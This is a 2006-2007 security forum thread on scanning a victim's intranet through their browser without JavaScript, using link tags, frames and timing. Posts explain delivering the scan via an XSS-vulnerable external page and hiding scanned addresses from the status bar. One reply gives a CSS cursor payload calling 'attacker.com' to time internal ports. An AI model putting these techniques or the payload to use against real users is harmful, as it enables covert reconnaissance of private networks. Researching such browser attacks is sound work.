Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: lpilorz
Date: November 29, 2006 09:15AM

I've seen some of you are interested in the Grossman's idea, so maybe we could exchange results? I've made a very small test case only, not anything really interesting, but I'll put some comments here for a good start.

1. The link tag seems to work for this in Firefox 2 and IE 7, Opera behaves differently.
2. In IE, you can use e.g. port 1 for time comparison (similar times means host/port down, shorter means host/port up)
3. Using 'http://' protocol prefix for port 21 will always give short times, but you can use 'ftp://x:x@' - the downside is an alert in FF (works fine in IE)

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: November 29, 2006 10:18AM

Vaguely off topic, but is there anything embedded that lynx calls? I can't think of anything off the top of my head, but maybe I'm not thinking properly. I know links does call frames so that may be handy, but I can't think of anything for Lynx off hand.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: November 30, 2006 11:26AM

More on the topic: http://ha.ckers.org/blog/20061130/portscanning-without-javascript-part-2/

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: jungsonn
Date: December 03, 2006 09:24AM

Still i don't understand the practical use of it.
To my knowledge you can just portscan with PHP alone

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: maluc
Date: December 03, 2006 10:32AM

/me points back to the ha.ckers blog comments

-maluc

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: jungsonn
Date: December 03, 2006 02:06PM

I commented back, heck.

Well, most intranets are on the net also, so you could link a stylesheet to a remote php file to scan back, or a local php if it runs linux/php.

Or am i completely missing the point? ^-^

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: December 03, 2006 08:59PM

I think you are sort of missing what we are talking about. Intranets aren't on the Internet, they are non-routable. They are behind firewalls and not pingable from the outside (RFC1918). However, since the user is behind the firewall they can see the addresses for us. PHP and all server side port scanning is unable to see what the client can see. So we are using their browser to do what we would normally be able to do for ourselves if we could route to the IPs.

Network Address Translation (NAT) is a security measure used by firewalls to protect the internal networks by not giving them actual world route-able addresses. So we get the user to see a malicious piece of JavaScript and that JavaScript runs on their computer which is behind the firewall and on the same subnet as the other non-route-able machines and therefore has access to do things we cannot do from a server side scan of the network since all we would see is one filtered IP rather than the machines behind that IP.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: jungsonn
Date: December 04, 2006 02:27AM

Yeah, thanx. i understand that, but where do you show that code to the user?
then you already have access to the intranet, why should you ping ports if your on it already?

that's what i'm missing here.

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: December 04, 2006 11:53AM

Ah... no, you show them the code on an external site that you have control over (a myspace page with an XSS vuln or whatever). The JavaScript then attempts to connect to the intranet. Using your browser as the conduit. Cross domain policies don't apply to embedded scripts that are being included, and you can test if they error out or don't. Using an external page you can make a browser scan it's own intranet.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: jungsonn
Date: December 04, 2006 12:00PM

Okay, that explains it better :)

I just though that it was meant that some dude was browsing through his intranet to a site, then you could just ping the living hell out ot him with php ^_^.

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: December 04, 2006 12:53PM

Yah, it's a confusing concept. It's something I came up with years ago, when I was first looking at looking glass scripts. I thought it was crazy that I could affect networks through a simple command injection issue. Later I thought of ways that you could build Java ping sweeps. Jeremiah took it to the next level by making a port scanner out of JavaScript (instead of my Java idea). Very cool.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: lpilorz
Date: December 18, 2006 12:19PM

Unfortunately I didn't have too much time to continue those tests, until today.

Because of the low speed of link tag scans, I think it could be divided into very small parts - for example 3-4 hosts/ports per subpage, with current progress stored in session (Ilia Alshanetsky already suggested it).

Unfortunately, the multipart/x-mixed-replace method causes browser status bar to reveal currently scanned addresses, while simply dividing scanning into frames (without multipart/x-mixed-replace) causes Firefox to show only the main domain in status bar (at least for unresponsive hosts - for those responding the local IP shows for just a moment). There is still problem with timeout of unresponsive hosts, but if you have only 3-4 scanning frames on each subpage, it shouldn't be much problem (local IP does not show in status bar, and user causes the scan to continue by going to other subpage).

From what I tried, it doesn't work for IE 6 (don't know how about 7), because it shows anything on the page only after loading all link tags (even those from frames). I'll try to make more tests on IE, maybe there is some way to bypass this problem.

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: Hong
Date: October 25, 2007 01:04PM

I notice that the cursor property in IE6(don't know about IE7) maybe able to launch a port scanning without javascript. Cursor property let you define a list of cursors and if the browser cannot handle the first cursor, it should attempt to handle the second cursor, etc.
In IE6, all GET requests of the cursor are following the sequence of the cursor list. It try to get the first cursor, if fail, then try to get the second, if fail, then try to get the third one, and so on. Therefore, we can using the time attack method like scanner using link tags in firefox. i.e.:

p.ip1
{
cursor:
url("http://attacker.com/portscan?ip=ip1&port=port1"),
url("ip1:port1"),
url("http://attacker.com/portscan?ip=ip1&port=port2"),
url("ip1:port2"),
url("http://attacker.com/portscan?ip=ip1&port=port3"),
url("ip1:port3"),
url("http://attacker.com/portscan?ip=ip1&port=port4"),
...
pointer
}

p.ip2
{
cursor:
url("http://attacker.com/portscan?ip=ip2&port=port1"),
url("ip2:port1"),
url("http://attacker.com/portscan?ip=ip2&port=port2"),
url("ip2:port2"),
url("http://attacker.com/portscan?ip=ip2&port=port3"),
url("ip2:port3"),
url("http://attacker.com/portscan?ip=ip2&port=port4"),
...
pointer
}

- Hong

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Date: October 26, 2007 01:42AM

Nice work, Hong.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Options: ReplyQuote
Re: Jeremiah Grossman's Browser Port Scanning without JavaScript
Posted by: rsnake
Date: November 11, 2007 02:07PM

Without testing this thoroughly, are you saying that a correct IP/port will take longer or shorter than an incorrect/invalid IP/port?

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote


Sorry, only registered users may post in this forum.